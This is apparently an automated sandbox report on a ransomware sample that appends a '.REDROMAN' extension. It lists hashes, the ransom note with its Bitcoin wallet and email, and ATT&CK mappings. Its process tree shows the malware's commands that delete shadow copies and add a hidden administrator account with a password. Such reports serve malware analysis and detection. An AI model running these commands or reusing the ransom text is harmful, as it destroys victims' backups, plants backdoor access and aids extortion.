Resubmissions

19-11-2020 14:39

201119-59epbrqadx 10

19-11-2020 14:22

201119-ff99dc42e6 10

19-11-2020 14:16

201119-298y5e8ncj 9

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    19-11-2020 14:22

General

  • Target

    f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe

  • Size

    1.8MB

  • MD5

    10d7151b9ee53b8da8ee6f85001ffb20

  • SHA1

    76d33ef58ea7b012342d975d871db64840da9675

  • SHA256

    f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093

  • SHA512

    1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html

Ransom Note
Critical Error! Your files have been corrupted! Follow these directions to easily restore them: 1. Purchase around $200 in Bitcoin (BTC). To learn more about Bitcoin, visit https://bitcoin.org/en/buy or https://buy.bitcoin.com 2. Send the new Bitcoin to the following address: 14BfVG4vH71NLmhu7vFKi9EMmeZFoiAsYP 3. Contact our Tech Support team at insupport@messagesafe.io and explain your issue. 4. After confirming your Bitcoin transfer, we will send you a file-repair tool to fix your entire system. 5. Run our file-cleaner and wait... Your data will be restored. To test our services, you may send up to 2 files for repairing before making the Bitcoin transfer. Estimated repair time after Bitcoin transfer: 24 hours
Emails

insupport@messagesafe.io

Wallets

14BfVG4vH71NLmhu7vFKi9EMmeZFoiAsYP

URLs

https://bitcoin.org/en/buy

https://buy.bitcoin.com

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 2 IoCs
  • Modifies service 2 TTPs 5 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:1488
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
          4⤵
          • Interacts with shadow copies
          PID:2524
        • C:\Windows\system32\net.exe
          net user /add RedROMAN p4zzaub71h
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user /add RedROMAN p4zzaub71h
            5⤵
              PID:2568
          • C:\Windows\system32\net.exe
            net localgroup administrators RedROMAN /add
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup administrators RedROMAN /add
              5⤵
                PID:2608
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Modifies service
        • Suspicious use of AdjustPrivilegeToken
        PID:2356
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\TraceRename.ex_.REDROMAN
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\TraceRename.ex_.REDROMAN
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:2644
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2788 CREDAT:275457 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2852
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" a -i#7zMap21596:184:7zEvent14446 -ad -saa -- "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS"
        1⤵
        • Drops startup file
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1876

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Account Manipulation

      1
      T1098

      Modify Existing Service

      1
      T1031

      Defense Evasion

      File Deletion

      2
      T1107

      Modify Registry

      2
      T1112

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\amdkey.bat
        MD5

        e1ccfa2c9fccc3306d6a2beafee97e88

        SHA1

        769a6f5692364611fb1c97b7f8909e305df46b0c

        SHA256

        8c6a13f418d0c11640ea15a0c42a4edc9f4175c4c924573c35b86929a7d25aaf

        SHA512

        f5ecf42ded57faa60cd98f7e43438c7b7158afb7061b836805469840880ae6b980dfe99f66bce8b52f2fa27eb0d07a48631da8f8fb82a3f12754a2024d70460c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
        MD5

        615a05ffd0f3a4dcd2131e2adf26bd96

        SHA1

        eac9f1ddb099e7cd653d9d0c757dfe6a753088ba

        SHA256

        3f29ece07a651a0ceae9569e84cade5b60f15ae6a2e44ae42b9fc1d6c37b2947

        SHA512

        1c0ef46ce6b39ab2290d4e6910a068219225de26f475f7842317e452aa987ef3e4ba3b9a209c1086c5120091fd8b7d774511d04a0f9917bb4d2320b946323faf

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        MD5

        f71960fa9c39f9a785ffd967ffe4b1c1

        SHA1

        613d89d563c7f4e5248112ecce2e5b89c39a2284

        SHA256

        9f331c03980bc7f49bfbae55df8c2c8f7a87aabe30ecce2c1d46995b6e9a7176

        SHA512

        974d3494e07999231ed93f5e620674b4c196a5be975562e98da259253820b4c5338fba5c90a475820ccfafd1302e7266ca0d4b8ea4e0b4fdaa98748159b0329a

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html
        MD5

        a15162a522fbd1ed603ab6415f4de0de

        SHA1

        33299e2baaff029b82c724630d4b5e5424353f18

        SHA256

        5d4d8f87b815bbc435d6b8b1b3d3349d06a6d82226a4ad0e17accf8b750d80dc

        SHA512

        d45ba782b9977131ce3b30661ec5db27fd94a169dc42ca6f0a907db20186c54348eaeae763279113fb81783d56478b9c98b2038948eb4c7cb18d00f4c292650d

      • C:\Users\Admin\Desktop\TraceRename.ex_.REDROMAN
        MD5

        61168d9b275e0d90b3d4df579d75a16e

        SHA1

        809b023d9ecf86b095791af6b39bc1985299c577

        SHA256

        6afb6dd934bc5725ea928d9b97e05493018954316795aca81c236596132252e4

        SHA512

        d183c1d906196b90ca95b8585a7c3915e80db087569cb3bcac206d040ce942a2d458043dfaf4d72f2fa0020965b000428ee4856c97d508a26811995861b734d5

      • \??\PIPE\samr
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • memory/396-19-0x0000000000000000-mapping.dmp
      • memory/1380-8-0x000000001C5F0000-0x000000001C5F1000-memory.dmp
        Filesize

        4KB

      • memory/1380-6-0x00000000023A0000-0x00000000023A1000-memory.dmp
        Filesize

        4KB

      • memory/1380-1-0x0000000000000000-mapping.dmp
      • memory/1380-7-0x000000001C200000-0x000000001C201000-memory.dmp
        Filesize

        4KB

      • memory/1380-2-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp
        Filesize

        9.9MB

      • memory/1380-3-0x00000000024F0000-0x00000000024F1000-memory.dmp
        Filesize

        4KB

      • memory/1380-4-0x000000001AC90000-0x000000001AC91000-memory.dmp
        Filesize

        4KB

      • memory/1380-5-0x0000000002440000-0x0000000002441000-memory.dmp
        Filesize

        4KB

      • memory/1472-14-0x0000000002750000-0x0000000002751000-memory.dmp
        Filesize

        4KB

      • memory/1472-12-0x00000000023D0000-0x00000000023D1000-memory.dmp
        Filesize

        4KB

      • memory/1472-17-0x000000001B9B0000-0x000000001B9B1000-memory.dmp
        Filesize

        4KB

      • memory/1472-9-0x0000000000000000-mapping.dmp
      • memory/1472-13-0x000000001ABE0000-0x000000001ABE1000-memory.dmp
        Filesize

        4KB

      • memory/1472-15-0x0000000002780000-0x0000000002781000-memory.dmp
        Filesize

        4KB

      • memory/1472-11-0x000007FEF5830000-0x000007FEF621C000-memory.dmp
        Filesize

        9.9MB

      • memory/1488-20-0x0000000000000000-mapping.dmp
      • memory/1740-0-0x000000013F640000-0x000000013F811000-memory.dmp
        Filesize

        1.8MB

      • memory/2524-21-0x0000000000000000-mapping.dmp
      • memory/2556-22-0x0000000000000000-mapping.dmp
      • memory/2568-23-0x0000000000000000-mapping.dmp
      • memory/2596-24-0x0000000000000000-mapping.dmp
      • memory/2608-25-0x0000000000000000-mapping.dmp
      • memory/2644-27-0x0000000000000000-mapping.dmp
      • memory/2664-29-0x000007FEF7730000-0x000007FEF79AA000-memory.dmp
        Filesize

        2.5MB

      • memory/2852-30-0x0000000000000000-mapping.dmp